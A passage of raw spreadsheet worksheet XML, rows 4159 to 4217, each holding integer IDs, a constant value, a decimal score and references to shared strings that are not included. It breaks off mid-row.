    <row r="4159" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4159" s="1">
        <v>4157</v>
      </c>
      <c r="B4159">
        <v>7737</v>
      </c>
      <c r="C4159">
        <v>7737</v>
      </c>
      <c r="D4159">
        <v>2</v>
      </c>
      <c r="E4159">
        <v>0.72890001535415649</v>
      </c>
      <c r="F4159" t="s">
        <v>5592</v>
      </c>
      <c r="G4159" t="s">
        <v>8222</v>
      </c>
      <c r="H4159" t="s">
        <v>8223</v>
      </c>
    </row>
    <row r="4160" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4160" s="1">
        <v>4158</v>
      </c>
      <c r="B4160">
        <v>7732</v>
      </c>
      <c r="C4160">
        <v>7732</v>
      </c>
      <c r="D4160">
        <v>2</v>
      </c>
      <c r="E4160">
        <v>0.55769997835159302</v>
      </c>
      <c r="F4160" t="s">
        <v>5592</v>
      </c>
      <c r="G4160" t="s">
        <v>8224</v>
      </c>
      <c r="H4160" t="s">
        <v>8225</v>
      </c>
    </row>
    <row r="4161" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4161" s="1">
        <v>4159</v>
      </c>
      <c r="B4161">
        <v>7731</v>
      </c>
      <c r="C4161">
        <v>7731</v>
      </c>
      <c r="D4161">
        <v>2</v>
      </c>
      <c r="E4161">
        <v>0.9747999906539917</v>
      </c>
      <c r="F4161" t="s">
        <v>5592</v>
      </c>
      <c r="G4161" t="s">
        <v>8226</v>
      </c>
      <c r="H4161" t="s">
        <v>8227</v>
      </c>
    </row>
    <row r="4162" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4162" s="1">
        <v>4160</v>
      </c>
      <c r="B4162">
        <v>7725</v>
      </c>
      <c r="C4162">
        <v>7725</v>
      </c>
      <c r="D4162">
        <v>2</v>
      </c>
      <c r="E4162">
        <v>0.77539998292922974</v>
      </c>
      <c r="F4162" t="s">
        <v>5592</v>
      </c>
      <c r="G4162" t="s">
        <v>8228</v>
      </c>
      <c r="H4162" t="s">
        <v>8229</v>
      </c>
    </row>
    <row r="4163" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4163" s="1">
        <v>4161</v>
      </c>
      <c r="B4163">
        <v>7729</v>
      </c>
      <c r="C4163">
        <v>7729</v>
      </c>
      <c r="D4163">
        <v>2</v>
      </c>
      <c r="E4163">
        <v>0.92460000514984131</v>
      </c>
      <c r="F4163" t="s">
        <v>5592</v>
      </c>
      <c r="G4163" t="s">
        <v>8230</v>
      </c>
      <c r="H4163" t="s">
        <v>8231</v>
      </c>
    </row>
    <row r="4164" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4164" s="1">
        <v>4162</v>
      </c>
      <c r="B4164">
        <v>7727</v>
      </c>
      <c r="C4164">
        <v>7727</v>
      </c>
      <c r="D4164">
        <v>2</v>
      </c>
      <c r="E4164">
        <v>0.92189997434616089</v>
      </c>
      <c r="F4164" t="s">
        <v>5592</v>
      </c>
      <c r="G4164" t="s">
        <v>8232</v>
      </c>
      <c r="H4164" t="s">
        <v>8233</v>
      </c>
    </row>
    <row r="4165" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4165" s="1">
        <v>4163</v>
      </c>
      <c r="B4165">
        <v>439</v>
      </c>
      <c r="C4165">
        <v>439</v>
      </c>
      <c r="D4165">
        <v>2</v>
      </c>
      <c r="E4165">
        <v>0.89789998531341553</v>
      </c>
      <c r="F4165" t="s">
        <v>5592</v>
      </c>
      <c r="G4165" t="s">
        <v>8234</v>
      </c>
      <c r="H4165" t="s">
        <v>8235</v>
      </c>
    </row>
    <row r="4166" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4166" s="1">
        <v>4164</v>
      </c>
      <c r="B4166">
        <v>440</v>
      </c>
      <c r="C4166">
        <v>440</v>
      </c>
      <c r="D4166">
        <v>2</v>
      </c>
      <c r="E4166">
        <v>0.446399986743927</v>
      </c>
      <c r="F4166" t="s">
        <v>5592</v>
      </c>
      <c r="G4166" t="s">
        <v>8236</v>
      </c>
      <c r="H4166" t="s">
        <v>8237</v>
      </c>
    </row>
    <row r="4167" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4167" s="1">
        <v>4165</v>
      </c>
      <c r="B4167">
        <v>441</v>
      </c>
      <c r="C4167">
        <v>441</v>
      </c>
      <c r="D4167">
        <v>2</v>
      </c>
      <c r="E4167">
        <v>0.67129999399185181</v>
      </c>
      <c r="F4167" t="s">
        <v>5592</v>
      </c>
      <c r="G4167" t="s">
        <v>8238</v>
      </c>
      <c r="H4167" t="s">
        <v>8239</v>
      </c>
    </row>
    <row r="4168" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4168" s="1">
        <v>4166</v>
      </c>
      <c r="B4168">
        <v>443</v>
      </c>
      <c r="C4168">
        <v>443</v>
      </c>
      <c r="D4168">
        <v>2</v>
      </c>
      <c r="E4168">
        <v>0.59729999303817749</v>
      </c>
      <c r="F4168" t="s">
        <v>5592</v>
      </c>
      <c r="G4168" t="s">
        <v>8240</v>
      </c>
      <c r="H4168" t="s">
        <v>8241</v>
      </c>
    </row>
    <row r="4169" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4169" s="1">
        <v>4167</v>
      </c>
      <c r="B4169">
        <v>444</v>
      </c>
      <c r="C4169">
        <v>444</v>
      </c>
      <c r="D4169">
        <v>2</v>
      </c>
      <c r="E4169">
        <v>0.62139999866485596</v>
      </c>
      <c r="F4169" t="s">
        <v>5592</v>
      </c>
      <c r="G4169" t="s">
        <v>8242</v>
      </c>
      <c r="H4169" t="s">
        <v>8243</v>
      </c>
    </row>
    <row r="4170" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4170" s="1">
        <v>4168</v>
      </c>
      <c r="B4170">
        <v>445</v>
      </c>
      <c r="C4170">
        <v>445</v>
      </c>
      <c r="D4170">
        <v>2</v>
      </c>
      <c r="E4170">
        <v>0.56559997797012329</v>
      </c>
      <c r="F4170" t="s">
        <v>5592</v>
      </c>
      <c r="G4170" t="s">
        <v>8244</v>
      </c>
      <c r="H4170" t="s">
        <v>8245</v>
      </c>
    </row>
    <row r="4171" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4171" s="1">
        <v>4169</v>
      </c>
      <c r="B4171">
        <v>447</v>
      </c>
      <c r="C4171">
        <v>447</v>
      </c>
      <c r="D4171">
        <v>2</v>
      </c>
      <c r="E4171">
        <v>0.6744999885559082</v>
      </c>
      <c r="F4171" t="s">
        <v>5592</v>
      </c>
      <c r="G4171" t="s">
        <v>8246</v>
      </c>
      <c r="H4171" t="s">
        <v>8247</v>
      </c>
    </row>
    <row r="4172" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4172" s="1">
        <v>4170</v>
      </c>
      <c r="B4172">
        <v>451</v>
      </c>
      <c r="C4172">
        <v>451</v>
      </c>
      <c r="D4172">
        <v>2</v>
      </c>
      <c r="E4172">
        <v>0.56190001964569092</v>
      </c>
      <c r="F4172" t="s">
        <v>5592</v>
      </c>
      <c r="G4172" t="s">
        <v>8248</v>
      </c>
      <c r="H4172" t="s">
        <v>8249</v>
      </c>
    </row>
    <row r="4173" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4173" s="1">
        <v>4171</v>
      </c>
      <c r="B4173">
        <v>452</v>
      </c>
      <c r="C4173">
        <v>452</v>
      </c>
      <c r="D4173">
        <v>2</v>
      </c>
      <c r="E4173">
        <v>0.5867999792098999</v>
      </c>
      <c r="F4173" t="s">
        <v>5592</v>
      </c>
      <c r="G4173" t="s">
        <v>8250</v>
      </c>
      <c r="H4173" t="s">
        <v>8251</v>
      </c>
    </row>
    <row r="4174" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4174" s="1">
        <v>4172</v>
      </c>
      <c r="B4174">
        <v>7728</v>
      </c>
      <c r="C4174">
        <v>7728</v>
      </c>
      <c r="D4174">
        <v>2</v>
      </c>
      <c r="E4174">
        <v>0.99239999055862427</v>
      </c>
      <c r="F4174" t="s">
        <v>5592</v>
      </c>
      <c r="G4174" t="s">
        <v>8252</v>
      </c>
      <c r="H4174" t="s">
        <v>8253</v>
      </c>
    </row>
    <row r="4175" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4175" s="1">
        <v>4173</v>
      </c>
      <c r="B4175">
        <v>519</v>
      </c>
      <c r="C4175">
        <v>519</v>
      </c>
      <c r="D4175">
        <v>2</v>
      </c>
      <c r="E4175">
        <v>0.99970000982284546</v>
      </c>
      <c r="F4175" t="s">
        <v>5592</v>
      </c>
      <c r="G4175" t="s">
        <v>8254</v>
      </c>
      <c r="H4175" t="s">
        <v>6156</v>
      </c>
    </row>
    <row r="4176" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4176" s="1">
        <v>4174</v>
      </c>
      <c r="B4176">
        <v>7808</v>
      </c>
      <c r="C4176">
        <v>7808</v>
      </c>
      <c r="D4176">
        <v>2</v>
      </c>
      <c r="E4176">
        <v>0.74390000104904175</v>
      </c>
      <c r="F4176" t="s">
        <v>5592</v>
      </c>
      <c r="G4176" t="s">
        <v>8255</v>
      </c>
      <c r="H4176" t="s">
        <v>8256</v>
      </c>
    </row>
    <row r="4177" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4177" s="1">
        <v>4175</v>
      </c>
      <c r="B4177">
        <v>7814</v>
      </c>
      <c r="C4177">
        <v>7814</v>
      </c>
      <c r="D4177">
        <v>2</v>
      </c>
      <c r="E4177">
        <v>0.85879999399185181</v>
      </c>
      <c r="F4177" t="s">
        <v>5592</v>
      </c>
      <c r="G4177" t="s">
        <v>8257</v>
      </c>
      <c r="H4177" t="s">
        <v>8258</v>
      </c>
    </row>
    <row r="4178" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4178" s="1">
        <v>4176</v>
      </c>
      <c r="B4178">
        <v>97</v>
      </c>
      <c r="C4178">
        <v>97</v>
      </c>
      <c r="D4178">
        <v>2</v>
      </c>
      <c r="E4178">
        <v>0.99879997968673706</v>
      </c>
      <c r="F4178" t="s">
        <v>5592</v>
      </c>
      <c r="G4178" t="s">
        <v>8259</v>
      </c>
      <c r="H4178" t="s">
        <v>8260</v>
      </c>
    </row>
    <row r="4179" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4179" s="1">
        <v>4177</v>
      </c>
      <c r="B4179">
        <v>98</v>
      </c>
      <c r="C4179">
        <v>98</v>
      </c>
      <c r="D4179">
        <v>2</v>
      </c>
      <c r="E4179">
        <v>0.99839997291564941</v>
      </c>
      <c r="F4179" t="s">
        <v>5592</v>
      </c>
      <c r="G4179" t="s">
        <v>8261</v>
      </c>
      <c r="H4179" t="s">
        <v>8262</v>
      </c>
    </row>
    <row r="4180" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4180" s="1">
        <v>4178</v>
      </c>
      <c r="B4180">
        <v>100</v>
      </c>
      <c r="C4180">
        <v>100</v>
      </c>
      <c r="D4180">
        <v>2</v>
      </c>
      <c r="E4180">
        <v>0.74119997024536133</v>
      </c>
      <c r="F4180" t="s">
        <v>5592</v>
      </c>
      <c r="G4180" t="s">
        <v>8263</v>
      </c>
      <c r="H4180" t="s">
        <v>8264</v>
      </c>
    </row>
    <row r="4181" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4181" s="1">
        <v>4179</v>
      </c>
      <c r="B4181">
        <v>7874</v>
      </c>
      <c r="C4181">
        <v>7874</v>
      </c>
      <c r="D4181">
        <v>2</v>
      </c>
      <c r="E4181">
        <v>0.9966999888420105</v>
      </c>
      <c r="F4181" t="s">
        <v>5592</v>
      </c>
      <c r="G4181" t="s">
        <v>8265</v>
      </c>
      <c r="H4181" t="s">
        <v>8266</v>
      </c>
    </row>
    <row r="4182" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4182" s="1">
        <v>4180</v>
      </c>
      <c r="B4182">
        <v>103</v>
      </c>
      <c r="C4182">
        <v>103</v>
      </c>
      <c r="D4182">
        <v>2</v>
      </c>
      <c r="E4182">
        <v>0.55349999666213989</v>
      </c>
      <c r="F4182" t="s">
        <v>5592</v>
      </c>
      <c r="G4182" t="s">
        <v>8267</v>
      </c>
      <c r="H4182" t="s">
        <v>8268</v>
      </c>
    </row>
    <row r="4183" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4183" s="1">
        <v>4181</v>
      </c>
      <c r="B4183">
        <v>7873</v>
      </c>
      <c r="C4183">
        <v>7873</v>
      </c>
      <c r="D4183">
        <v>2</v>
      </c>
      <c r="E4183">
        <v>0.99390000104904175</v>
      </c>
      <c r="F4183" t="s">
        <v>5592</v>
      </c>
      <c r="G4183" t="s">
        <v>8269</v>
      </c>
      <c r="H4183" t="s">
        <v>8270</v>
      </c>
    </row>
    <row r="4184" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4184" s="1">
        <v>4182</v>
      </c>
      <c r="B4184">
        <v>106</v>
      </c>
      <c r="C4184">
        <v>106</v>
      </c>
      <c r="D4184">
        <v>2</v>
      </c>
      <c r="E4184">
        <v>0.92100000381469727</v>
      </c>
      <c r="F4184" t="s">
        <v>5592</v>
      </c>
      <c r="G4184" t="s">
        <v>8271</v>
      </c>
      <c r="H4184" t="s">
        <v>8272</v>
      </c>
    </row>
    <row r="4185" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4185" s="1">
        <v>4183</v>
      </c>
      <c r="B4185">
        <v>107</v>
      </c>
      <c r="C4185">
        <v>107</v>
      </c>
      <c r="D4185">
        <v>2</v>
      </c>
      <c r="E4185">
        <v>0.47209998965263372</v>
      </c>
      <c r="F4185" t="s">
        <v>5592</v>
      </c>
      <c r="G4185" t="s">
        <v>8273</v>
      </c>
      <c r="H4185" t="s">
        <v>8274</v>
      </c>
    </row>
    <row r="4186" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4186" s="1">
        <v>4184</v>
      </c>
      <c r="B4186">
        <v>108</v>
      </c>
      <c r="C4186">
        <v>108</v>
      </c>
      <c r="D4186">
        <v>2</v>
      </c>
      <c r="E4186">
        <v>0.99720001220703125</v>
      </c>
      <c r="F4186" t="s">
        <v>5592</v>
      </c>
      <c r="G4186" t="s">
        <v>8275</v>
      </c>
      <c r="H4186" t="s">
        <v>8276</v>
      </c>
    </row>
    <row r="4187" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4187" s="1">
        <v>4185</v>
      </c>
      <c r="B4187">
        <v>110</v>
      </c>
      <c r="C4187">
        <v>110</v>
      </c>
      <c r="D4187">
        <v>2</v>
      </c>
      <c r="E4187">
        <v>0.83689999580383301</v>
      </c>
      <c r="F4187" t="s">
        <v>5592</v>
      </c>
      <c r="G4187" t="s">
        <v>8277</v>
      </c>
      <c r="H4187" t="s">
        <v>8278</v>
      </c>
    </row>
    <row r="4188" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4188" s="1">
        <v>4186</v>
      </c>
      <c r="B4188">
        <v>7872</v>
      </c>
      <c r="C4188">
        <v>7872</v>
      </c>
      <c r="D4188">
        <v>2</v>
      </c>
      <c r="E4188">
        <v>0.75779998302459717</v>
      </c>
      <c r="F4188" t="s">
        <v>5592</v>
      </c>
      <c r="G4188" t="s">
        <v>8279</v>
      </c>
      <c r="H4188" t="s">
        <v>8280</v>
      </c>
    </row>
    <row r="4189" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4189" s="1">
        <v>4187</v>
      </c>
      <c r="B4189">
        <v>113</v>
      </c>
      <c r="C4189">
        <v>113</v>
      </c>
      <c r="D4189">
        <v>2</v>
      </c>
      <c r="E4189">
        <v>0.60280001163482666</v>
      </c>
      <c r="F4189" t="s">
        <v>5592</v>
      </c>
      <c r="G4189" t="s">
        <v>8281</v>
      </c>
      <c r="H4189" t="s">
        <v>8282</v>
      </c>
    </row>
    <row r="4190" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4190" s="1">
        <v>4188</v>
      </c>
      <c r="B4190">
        <v>7870</v>
      </c>
      <c r="C4190">
        <v>7870</v>
      </c>
      <c r="D4190">
        <v>2</v>
      </c>
      <c r="E4190">
        <v>0.99980002641677856</v>
      </c>
      <c r="F4190" t="s">
        <v>5592</v>
      </c>
      <c r="G4190" t="s">
        <v>8283</v>
      </c>
      <c r="H4190" t="s">
        <v>8284</v>
      </c>
    </row>
    <row r="4191" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4191" s="1">
        <v>4189</v>
      </c>
      <c r="B4191">
        <v>116</v>
      </c>
      <c r="C4191">
        <v>116</v>
      </c>
      <c r="D4191">
        <v>2</v>
      </c>
      <c r="E4191">
        <v>0.99800002574920654</v>
      </c>
      <c r="F4191" t="s">
        <v>5592</v>
      </c>
      <c r="G4191" t="s">
        <v>8285</v>
      </c>
      <c r="H4191" t="s">
        <v>8286</v>
      </c>
    </row>
    <row r="4192" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4192" s="1">
        <v>4190</v>
      </c>
      <c r="B4192">
        <v>117</v>
      </c>
      <c r="C4192">
        <v>117</v>
      </c>
      <c r="D4192">
        <v>2</v>
      </c>
      <c r="E4192">
        <v>0.98240000009536743</v>
      </c>
      <c r="F4192" t="s">
        <v>5592</v>
      </c>
      <c r="G4192" t="s">
        <v>8287</v>
      </c>
      <c r="H4192" t="s">
        <v>8288</v>
      </c>
    </row>
    <row r="4193" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4193" s="1">
        <v>4191</v>
      </c>
      <c r="B4193">
        <v>7869</v>
      </c>
      <c r="C4193">
        <v>7869</v>
      </c>
      <c r="D4193">
        <v>2</v>
      </c>
      <c r="E4193">
        <v>0.98940002918243408</v>
      </c>
      <c r="F4193" t="s">
        <v>5592</v>
      </c>
      <c r="G4193" t="s">
        <v>8289</v>
      </c>
      <c r="H4193" t="s">
        <v>8290</v>
      </c>
    </row>
    <row r="4194" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4194" s="1">
        <v>4192</v>
      </c>
      <c r="B4194">
        <v>120</v>
      </c>
      <c r="C4194">
        <v>120</v>
      </c>
      <c r="D4194">
        <v>2</v>
      </c>
      <c r="E4194">
        <v>0.84609997272491455</v>
      </c>
      <c r="F4194" t="s">
        <v>5592</v>
      </c>
      <c r="G4194" t="s">
        <v>8291</v>
      </c>
      <c r="H4194" t="s">
        <v>8292</v>
      </c>
    </row>
    <row r="4195" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4195" s="1">
        <v>4193</v>
      </c>
      <c r="B4195">
        <v>121</v>
      </c>
      <c r="C4195">
        <v>121</v>
      </c>
      <c r="D4195">
        <v>2</v>
      </c>
      <c r="E4195">
        <v>0.49520000815391541</v>
      </c>
      <c r="F4195" t="s">
        <v>5592</v>
      </c>
      <c r="G4195" t="s">
        <v>8293</v>
      </c>
      <c r="H4195" t="s">
        <v>8294</v>
      </c>
    </row>
    <row r="4196" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4196" s="1">
        <v>4194</v>
      </c>
      <c r="B4196">
        <v>122</v>
      </c>
      <c r="C4196">
        <v>122</v>
      </c>
      <c r="D4196">
        <v>2</v>
      </c>
      <c r="E4196">
        <v>0.74049997329711914</v>
      </c>
      <c r="F4196" t="s">
        <v>5592</v>
      </c>
      <c r="G4196" t="s">
        <v>8295</v>
      </c>
      <c r="H4196" t="s">
        <v>8296</v>
      </c>
    </row>
    <row r="4197" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4197" s="1">
        <v>4195</v>
      </c>
      <c r="B4197">
        <v>129</v>
      </c>
      <c r="C4197">
        <v>129</v>
      </c>
      <c r="D4197">
        <v>2</v>
      </c>
      <c r="E4197">
        <v>0.99970000982284546</v>
      </c>
      <c r="F4197" t="s">
        <v>5592</v>
      </c>
      <c r="G4197" t="s">
        <v>8297</v>
      </c>
      <c r="H4197" t="s">
        <v>8298</v>
      </c>
    </row>
    <row r="4198" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4198" s="1">
        <v>4196</v>
      </c>
      <c r="B4198">
        <v>130</v>
      </c>
      <c r="C4198">
        <v>130</v>
      </c>
      <c r="D4198">
        <v>2</v>
      </c>
      <c r="E4198">
        <v>0.99379998445510864</v>
      </c>
      <c r="F4198" t="s">
        <v>5592</v>
      </c>
      <c r="G4198" t="s">
        <v>8299</v>
      </c>
      <c r="H4198" t="s">
        <v>8300</v>
      </c>
    </row>
    <row r="4199" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4199" s="1">
        <v>4197</v>
      </c>
      <c r="B4199">
        <v>7876</v>
      </c>
      <c r="C4199">
        <v>7876</v>
      </c>
      <c r="D4199">
        <v>2</v>
      </c>
      <c r="E4199">
        <v>0.70520001649856567</v>
      </c>
      <c r="F4199" t="s">
        <v>5592</v>
      </c>
      <c r="G4199" t="s">
        <v>8301</v>
      </c>
      <c r="H4199" t="s">
        <v>8302</v>
      </c>
    </row>
    <row r="4200" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4200" s="1">
        <v>4198</v>
      </c>
      <c r="B4200">
        <v>88</v>
      </c>
      <c r="C4200">
        <v>88</v>
      </c>
      <c r="D4200">
        <v>2</v>
      </c>
      <c r="E4200">
        <v>0.7304999828338623</v>
      </c>
      <c r="F4200" t="s">
        <v>5592</v>
      </c>
      <c r="G4200" t="s">
        <v>8303</v>
      </c>
      <c r="H4200" t="s">
        <v>8304</v>
      </c>
    </row>
    <row r="4201" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4201" s="1">
        <v>4199</v>
      </c>
      <c r="B4201">
        <v>7880</v>
      </c>
      <c r="C4201">
        <v>7880</v>
      </c>
      <c r="D4201">
        <v>2</v>
      </c>
      <c r="E4201">
        <v>0.54430001974105835</v>
      </c>
      <c r="F4201" t="s">
        <v>5592</v>
      </c>
      <c r="G4201" t="s">
        <v>8305</v>
      </c>
      <c r="H4201" t="s">
        <v>8306</v>
      </c>
    </row>
    <row r="4202" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4202" s="1">
        <v>4200</v>
      </c>
      <c r="B4202">
        <v>7881</v>
      </c>
      <c r="C4202">
        <v>7881</v>
      </c>
      <c r="D4202">
        <v>2</v>
      </c>
      <c r="E4202">
        <v>0.97549998760223389</v>
      </c>
      <c r="F4202" t="s">
        <v>5592</v>
      </c>
      <c r="G4202" t="s">
        <v>8307</v>
      </c>
      <c r="H4202" t="s">
        <v>8308</v>
      </c>
    </row>
    <row r="4203" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4203" s="1">
        <v>4201</v>
      </c>
      <c r="B4203">
        <v>5</v>
      </c>
      <c r="C4203">
        <v>5</v>
      </c>
      <c r="D4203">
        <v>2</v>
      </c>
      <c r="E4203">
        <v>0.80430001020431519</v>
      </c>
      <c r="F4203" t="s">
        <v>5592</v>
      </c>
      <c r="G4203" t="s">
        <v>8309</v>
      </c>
      <c r="H4203" t="s">
        <v>8310</v>
      </c>
    </row>
    <row r="4204" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4204" s="1">
        <v>4202</v>
      </c>
      <c r="B4204">
        <v>7923</v>
      </c>
      <c r="C4204">
        <v>7923</v>
      </c>
      <c r="D4204">
        <v>2</v>
      </c>
      <c r="E4204">
        <v>0.81080001592636108</v>
      </c>
      <c r="F4204" t="s">
        <v>5592</v>
      </c>
      <c r="G4204" t="s">
        <v>8311</v>
      </c>
      <c r="H4204" t="s">
        <v>8312</v>
      </c>
    </row>
    <row r="4205" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4205" s="1">
        <v>4203</v>
      </c>
      <c r="B4205">
        <v>7921</v>
      </c>
      <c r="C4205">
        <v>7921</v>
      </c>
      <c r="D4205">
        <v>2</v>
      </c>
      <c r="E4205">
        <v>0.86529999971389771</v>
      </c>
      <c r="F4205" t="s">
        <v>5592</v>
      </c>
      <c r="G4205" t="s">
        <v>8313</v>
      </c>
      <c r="H4205" t="s">
        <v>8314</v>
      </c>
    </row>
    <row r="4206" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4206" s="1">
        <v>4204</v>
      </c>
      <c r="B4206">
        <v>7919</v>
      </c>
      <c r="C4206">
        <v>7919</v>
      </c>
      <c r="D4206">
        <v>2</v>
      </c>
      <c r="E4206">
        <v>0.35220000147819519</v>
      </c>
      <c r="F4206" t="s">
        <v>5592</v>
      </c>
      <c r="G4206" t="s">
        <v>8315</v>
      </c>
      <c r="H4206" t="s">
        <v>8316</v>
      </c>
    </row>
    <row r="4207" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4207" s="1">
        <v>4205</v>
      </c>
      <c r="B4207">
        <v>7915</v>
      </c>
      <c r="C4207">
        <v>7915</v>
      </c>
      <c r="D4207">
        <v>2</v>
      </c>
      <c r="E4207">
        <v>0.99000000953674316</v>
      </c>
      <c r="F4207" t="s">
        <v>5592</v>
      </c>
      <c r="G4207" t="s">
        <v>8317</v>
      </c>
      <c r="H4207" t="s">
        <v>8318</v>
      </c>
    </row>
    <row r="4208" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4208" s="1">
        <v>4206</v>
      </c>
      <c r="B4208">
        <v>7910</v>
      </c>
      <c r="C4208">
        <v>7910</v>
      </c>
      <c r="D4208">
        <v>2</v>
      </c>
      <c r="E4208">
        <v>0.51050001382827759</v>
      </c>
      <c r="F4208" t="s">
        <v>5592</v>
      </c>
      <c r="G4208" t="s">
        <v>8319</v>
      </c>
      <c r="H4208" t="s">
        <v>8320</v>
      </c>
    </row>
    <row r="4209" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4209" s="1">
        <v>4207</v>
      </c>
      <c r="B4209">
        <v>7903</v>
      </c>
      <c r="C4209">
        <v>7903</v>
      </c>
      <c r="D4209">
        <v>2</v>
      </c>
      <c r="E4209">
        <v>0.99510002136230469</v>
      </c>
      <c r="F4209" t="s">
        <v>5592</v>
      </c>
      <c r="G4209" t="s">
        <v>8321</v>
      </c>
      <c r="H4209" t="s">
        <v>8322</v>
      </c>
    </row>
    <row r="4210" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4210" s="1">
        <v>4208</v>
      </c>
      <c r="B4210">
        <v>7900</v>
      </c>
      <c r="C4210">
        <v>7900</v>
      </c>
      <c r="D4210">
        <v>2</v>
      </c>
      <c r="E4210">
        <v>0.5250999927520752</v>
      </c>
      <c r="F4210" t="s">
        <v>5592</v>
      </c>
      <c r="G4210" t="s">
        <v>8323</v>
      </c>
      <c r="H4210" t="s">
        <v>8324</v>
      </c>
    </row>
    <row r="4211" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4211" s="1">
        <v>4209</v>
      </c>
      <c r="B4211">
        <v>7898</v>
      </c>
      <c r="C4211">
        <v>7898</v>
      </c>
      <c r="D4211">
        <v>2</v>
      </c>
      <c r="E4211">
        <v>0.95340001583099365</v>
      </c>
      <c r="F4211" t="s">
        <v>5592</v>
      </c>
      <c r="G4211" t="s">
        <v>8325</v>
      </c>
      <c r="H4211" t="s">
        <v>8326</v>
      </c>
    </row>
    <row r="4212" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4212" s="1">
        <v>4210</v>
      </c>
      <c r="B4212">
        <v>7897</v>
      </c>
      <c r="C4212">
        <v>7897</v>
      </c>
      <c r="D4212">
        <v>2</v>
      </c>
      <c r="E4212">
        <v>0.99589997529983521</v>
      </c>
      <c r="F4212" t="s">
        <v>5592</v>
      </c>
      <c r="G4212" t="s">
        <v>8327</v>
      </c>
      <c r="H4212" t="s">
        <v>8328</v>
      </c>
    </row>
    <row r="4213" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4213" s="1">
        <v>4211</v>
      </c>
      <c r="B4213">
        <v>7868</v>
      </c>
      <c r="C4213">
        <v>7868</v>
      </c>
      <c r="D4213">
        <v>2</v>
      </c>
      <c r="E4213">
        <v>0.82270002365112305</v>
      </c>
      <c r="F4213" t="s">
        <v>5592</v>
      </c>
      <c r="G4213" t="s">
        <v>8329</v>
      </c>
      <c r="H4213" t="s">
        <v>8330</v>
      </c>
    </row>
    <row r="4214" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4214" s="1">
        <v>4212</v>
      </c>
      <c r="B4214">
        <v>7895</v>
      </c>
      <c r="C4214">
        <v>7895</v>
      </c>
      <c r="D4214">
        <v>2</v>
      </c>
      <c r="E4214">
        <v>0.9966999888420105</v>
      </c>
      <c r="F4214" t="s">
        <v>5592</v>
      </c>
      <c r="G4214" t="s">
        <v>8331</v>
      </c>
      <c r="H4214" t="s">
        <v>8332</v>
      </c>
    </row>
    <row r="4215" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4215" s="1">
        <v>4213</v>
      </c>
      <c r="B4215">
        <v>7888</v>
      </c>
      <c r="C4215">
        <v>7888</v>
      </c>
      <c r="D4215">
        <v>2</v>
      </c>
      <c r="E4215">
        <v>0.49279999732971191</v>
      </c>
      <c r="F4215" t="s">
        <v>5592</v>
      </c>
      <c r="G4215" t="s">
        <v>8333</v>
      </c>
      <c r="H4215" t="s">
        <v>8334</v>
      </c>
    </row>
    <row r="4216" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4216" s="1">
        <v>4214</v>
      </c>
      <c r="B4216">
        <v>60</v>
      </c>
      <c r="C4216">
        <v>60</v>
      </c>
      <c r="D4216">
        <v>2</v>
      </c>
      <c r="E4216">
        <v>0.78570002317428589</v>
      </c>
      <c r="F4216" t="s">
        <v>5592</v>
      </c>
      <c r="G4216" t="s">
        <v>8335</v>
      </c>
      <c r="H4216" t="s">
        <v>8336</v>
      </c>
    </row>
    <row r="4217" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4217" s="1">
        <v>4215</v>
      </c>
      <c r="B4217">
        <v>64</v>
      </c>
      <c r="C4217">
        <v>64</v>
      </c>
      <c r="D4217">
        <v>2</v>
      </c>
      <c r="E4217">
